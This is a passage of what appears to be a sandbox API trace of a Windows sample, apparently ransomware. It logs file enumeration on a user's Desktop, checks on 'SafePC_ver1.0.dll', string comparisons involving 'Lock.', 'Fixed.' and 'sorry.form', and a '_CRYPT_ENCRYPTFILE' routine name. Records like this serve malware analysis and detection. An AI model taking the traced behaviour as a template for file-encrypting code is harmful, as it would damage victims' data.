(normalized: "c:\\users\\fd1hvy\\desktop\\safepc_ver1.0.dll")) returned 1 [0206.329] FindNextFileW (in: hFindFile=0xa874d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd42a9d0f, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd42a9d0f, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd42cff4e, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="SafePC_ver1.0.dll", cAlternateFileName="SAFEPC~1.DLL")) returned 0 [0206.329] FindClose (in: hFindFile=0xa874d0 | out: hFindFile=0xa874d0) returned 1 [0206.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0206.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0206.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0206.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0206.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0206.329] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0206.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0206.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0206.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0206.329] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0206.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0206.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0206.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0206.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0206.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0206.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0206.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0206.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0206.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0206.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0206.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0206.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0206.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0206.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0206.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0206.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0206.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0206.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0206.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0206.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x2e563a8 [0206.330] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/SafePC_ver1.0.dll", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll", lpFilePart=0x8cf650*="SafePC_ver1.0.dll") returned 0x29 [0206.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0206.330] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\safepc_ver1.0.dll")) returned 0xffffffff [0206.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0206.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0206.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0206.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0206.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0206.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0206.331] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0206.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0206.331] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0206.331] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0206.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0206.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0206.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0206.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0206.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0206.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0206.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0206.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0206.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0206.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0206.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0206.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0206.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0206.331] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sorry.form", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.331] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="orry.form", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.331] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rry.form", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.331] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ry.form", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.331] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y.form", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.331] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".form", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0206.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0206.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0206.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0206.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0206.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0206.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0206.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0206.332] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0206.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0206.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0206.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0206.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0206.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0206.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0206.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0206.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0206.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0206.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0206.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0206.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0206.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0206.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0206.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0206.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0206.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0206.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0206.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69988 [0206.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0206.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sorry.form", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="orry.form", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rry.form", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ry.form", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y.form", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0206.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0206.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0206.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0206.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0206.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0206.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0206.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0206.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0206.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0206.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0206.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0206.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0206.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0206.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0206.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0206.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0206.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0206.333] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0206.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0206.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0206.333] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0206.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0206.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0206.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0206.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0206.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0206.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0206.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0206.334] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0206.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0206.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0206.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0206.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0206.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0206.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0206.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0206.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0206.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0206.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0206.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0206.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0206.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0206.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0206.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0206.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0206.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0206.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0206.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0206.335] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0206.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0206.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0206.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0206.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0206.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0206.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0206.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0206.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0206.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0206.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0206.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0206.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0206.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0206.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0206.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0206.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0206.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0206.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0206.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0206.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b78 [0206.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0206.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0206.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0206.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53788 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0206.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0206.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0206.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0206.336] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0206.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0206.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0206.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0206.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0206.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0206.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0206.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0206.337] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0206.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0206.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0206.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0206.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0206.338] 